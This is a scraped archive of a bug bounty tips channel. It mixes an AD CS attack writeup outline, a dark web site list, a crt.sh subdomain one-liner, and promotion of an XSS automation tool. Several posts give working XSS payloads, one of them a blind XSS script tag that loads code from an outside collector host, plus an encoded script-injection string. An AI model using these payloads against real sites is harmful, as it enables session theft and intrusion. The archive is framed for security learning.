Endi mavjud! Telegram Tadqiqoti 2025 β yilning asosiy insaytlari 
Bug bounty Tips
Kanalga Telegramβda oβtish
π‘οΈ Cybersecurity enthusiast | π» Helping secure the digital world | π Web App Tester | π΅οΈββοΈ OSINT Specialist Admin: @laazy_hack3r
Ko'proq ko'rsatish5 816
Obunachilar
+824 soatlar
+657 kunlar
+39030 kunlar
Postlar arxiv
5 813
Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess
This writeup is mainly to document my research into AD CS attacks and provide a source of knowledge for others to learn from.
β’ Active Directory Certificate Services (AD CS): A Beautifully Vulnerable and Mis-configurable Mess β’ Introduction β’ Welcome to the Family: The ESC Family β’ ESC1 - Template Misconfiguration β’ ESC2 β Template Misconfiguration: Part II β’ ESC3 β Enrollment Agent Template Misconfiguration β’ ESC4 β Template Access Control Misconfiguration β’ ESC5 β PKI Objects Access Control β’ ESC6 β Arbitrary SAN Usage β’ ESC7 β CA Permissions Misconfiguration β’ ESC8 β NTLM Relay to AD CS HTTP Endpoints β’ ESC9 β No Security Extension β’ ESC10 β Weak Certificate Mappings β’ ESC11 β Relaying NTLM to ICPR β’ ESC12 β ADCS CA on YubiHSM β’ ESC13 - OID Group Link Abuse β’ Practical Exploitation β’ Enumeration β’ Exploitation of ESC1 β’ Exploitation of ESC3 β’ Exploitation of ESC4 β’ Exploitation of ESC6 β’ Exploitation of ESC7 β’ Exploitation of ESC8 β’ Exploitation of ESC9 β’ Exploitation of ESC10 β’ Exploitation of ESC11 β’ Exploitation of ESC13 β’ Conclusionj
5 813
https://twitter.com/Cipher0ps_tech/status/1809199297193476173?s=19
Check out this, it skyrocketing in my feed
5 813
Unpopular opinionπ
5 Dark website you don't know exist.πΊπ
Save it or lose it foreverπ
β
1. The CIA cia
Access the CIA on Tor for anonymous communication, contact info, job listings, and more without being tracked.
β
2. Onion.name @theonion
Get custom (.onion) domains that make sense for your dark web site, helping visitors easily identify your site.
β
3. BBC Tor Mirror @bbc
Bypass country blocks with the BBC's Tor mirror, allowing anonymous access to it's website.
β
4. Elude
Send and receive anonymous emails without needing personal info. Perfect for securely sharing sensitive information
β
5. Just another library @just_anotherlibrary
Access a million books in over 40 categories, from fantasy novels to biographies.
Stay informed, stay secure! π»π
π Follow us for more cybersecurity tips and tricks!
π Visit us at www.cipherops.xyz
π² @cipherops.tech
#dark #darkweb #onion #website #top #cia #bbc #kali #kalilinux #tor #bug #bugbounty #bugbountytips #anonymous #book #information #job #hacking #hackingtools #trending #reels #trendingreels #viral #learnings
https://www.instagram.com/reel/C9E_RJTSTP8/?igsh=MTc4MmM1YmI2Ng==
5 813
A quick one liner to get a list of domains associated with a target by using crt.sh!
===================
curl -s 'crt.sh/?q=tesla.com&oβ¦' --compressed -H 'User-Agent: Mozilla/5.0'|jq -r '.[].common_name,.[].name_value'|sort -u
===================
#bugbounty #bugbountytips #cybersecurity
5 813
I am looking for am viral video editor if anyone wants to work let me know places and do refer if anyone know from your frnds list
5 813
Tool tool toolπ±
Check out this Auto_xss tool which alow you to automate the process from finding subdomains of a target to identifying xss vulnerability
Ps Dm "AUTO" I will personally messege the tool link for you.
Stay informed, stay secure! π»π
π Follow us for more cybersecurity tips and tricks!
π Visit us at www.cipherops.xyz
π² @cipherops.tech
#tool #xss #hacking #hackingtools #bugbountytips #bugbounty #bug #infosec #cyber #cyberpunk #cybersecuritytips #auto #automation #target #cybersecurity #networking #network #trending #trend #reels #viral
https://www.instagram.com/reel/C9EPMWnyAEE/?igsh=MTc4MmM1YmI2Ng==
5 813
Payloads ;
RXSS : "mitsec<form/><!><details/open/ontoggle=alert(document.domain)>"@gmail.com
BXSS : '"><script src=xss.report/c/username></script>
#payload #bugbountytip
5 813
This payload can be used for Client Side Template injection and Reflected XSS, perhaps a code injection can be triggered in the background
Payload :
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
#bugbountytips #BugBounty #payload
5 813
The bounty ka tipπ
I wonder why some sys-admin configure the server with sudo privilages!
.
.
π Save this post for later and share it with your friends.
π¬ Got questions? Drop them in the comments! π
Check out the link in our bio for a detailed guide.
Stay informed, stay secure! π»π
π Follow us for more cybersecurity tips and tricks!
π Visit us at www.cipherops.xyz
π² @cipherops.tech
#cyber #cyberpunk #sys #sudo #sudouest #server #admin #hack #hacking #tip #tips #trick #kalilinux #tools #bug #bugbounty #bugbountytips #cybersecurity #cybersecuritytips
https://www.instagram.com/p/C9Cad1jSO2J/?igsh=MTc4MmM1YmI2Ng==
5 813
βNot even Einstein can remember all this so save it!
Welcome, homeπ‘ Hunters today I am sharing.
π€How to get started in BugBounty hunting.
Here's are the thingsπ
1. Understanding what BugBounty is?
2. Develop your skills
3. Join BugBounty platforms
4. Start small and read pervious reports
5. Stay ethical and report responsibly
Stay informed, stay secure! π»ππ
Follow us for more cybersecurity tips and tricks!
π Visit us at www.cipherops.xyz
π
±οΈ Visit for notes at book.cipheroos.xyz
π¨ Visit for my tool at github Auto_xss
π² @cipherops.tech
@hacker_hub8 @myself_immortal @cyber.techq @code_ravan @0xph03n1x0
#cyberpunk #kalilinux #bugbounty #bug #infosec #cybersecurity #cyber #beginner #getting #started #skill #skills #platforms #reporter #ethical #hacking #trending #trendingreels #post
https://www.instagram.com/p/C8_1r9CSE7V/?igsh=MTc4MmM1YmI2Ng==
5 813
Guys finally my tool is ready after the update i have attached the video of how to use it and also shown the results too. soo do check it out and share it to as many people as possible and hoping
I get a lot of reactions
and please do star my tool on the GitHub so that you guys don't miss on any future updates.
https://github.com/Adwaithsheety/Auto_xss
5 813
updating my auto_xss tool
checking if the files are already existed if yes then it will move to next tool
then removed the gau and added Hakrawel, waybackurl and katana to find endpoints and combine all three results and sort it to one file
in testing the updated tool will be in github verysoon
if you guys want to give any suggestions with the changes you guys can
5 813
My first video, on how to install kali linux has been uploaded, please do check and let me know your thoughts
